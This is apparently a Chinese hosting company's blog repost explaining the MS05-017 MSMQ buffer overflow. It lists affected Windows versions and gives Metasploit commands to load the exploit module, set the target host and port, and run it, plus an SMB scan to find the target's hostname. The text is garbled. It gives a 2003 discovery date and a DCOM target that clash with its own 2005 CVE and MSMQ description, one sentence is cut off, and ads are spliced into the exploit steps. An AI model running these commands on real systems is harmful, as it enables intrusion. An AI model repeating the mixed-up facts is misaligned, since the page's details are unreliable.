重庆分公司,新征程启航

为企业提供网站建设、域名注册、服务器等服务

ms05-017漏洞原理与复现-创新互联

漏洞描述
此漏洞由lds-pl.net漏洞研究组在2003年7月16日发现,漏洞及exp在网上公开后,网上出现了大量的×××实例,利用此漏洞的蠕虫也大量出现。
漏洞编号
CVE-2005-0059
OSVDB-15458
MSB-MS05-017
BID-13112
×××目标
DCOM接口的服务器端
影响系统
Microsoft Windows XP Service Pack 1
    Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium)
    Microsoft Windows 2000 Service Pack 4
    Microsoft Windows 2000 Service Pack 3
    Microsoft Windows 98 Second Edition (SE) 
    Microsoft Windows 98
漏洞原理
msmq在将输入的字符串传递到缓冲区之前没有执行正确的验证,因此,可通过传递特制的msmq消息来触发漏洞造成缓冲区溢出漏洞。漏洞可导致远程代码执行、本地提权。由于msmq
概念解释
1. msmq( MicroSoft Message Queuing, 微软消息队列)是在多个不同的应用之间实现互相通信的一种异步消息传输模式,互相通信的应用可以位于同一台机器上,也可以分布于网络空间中的任意位置。msmq实现原理:消息的发送者将想要发送的消息发送至一个message中,然后保存至一个系统公共空间的消息队列(Message Queuing)中,需要接受message的应用从Message Queuing中取出Message进行处理。msmq在消息传递时,需要借助hostname来通信。
metasploit exp可用目标
Windows 2000 ALL 
Windows XP SP0-SP1 (English)
metasploit利用ms05-017

利用此payload需要netbios hostname、ip、port三项内容

10年积累的网站设计、成都网站建设经验,可以快速应对客户对网站的新想法和需求。提供各种问题对应的解决方案。让选择我们的客户得到更好、更有力的网络服务。我虽然不认识你,你也不认识我。但先网站制作后付款的网站建设流程,更有韶关免费网站建设让你可以放心的选择与我们合作。
use exploit/windows/dcerpc/ms05_017_msmq
set hname 
set rhost 
set rport 
run -j

msf中查看hname

use scanner/smb/smb_version
set rhost 
set threads 24
run
不使用metasploit情况下利用ms05-017
暂未发现,后续补充
参考文章
  1. MS05-017 Microsoft Message Queueing Service Path Overflow
  2. Virus Encyclopedia
  3. MSMQ

另外有需要云服务器可以了解下创新互联scvps.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。


文章标题:ms05-017漏洞原理与复现-创新互联
标题链接:http://cqcxhl.cn/article/dgsidp.html

其他资讯

在线咨询
服务热线
服务热线:028-86922220
TOP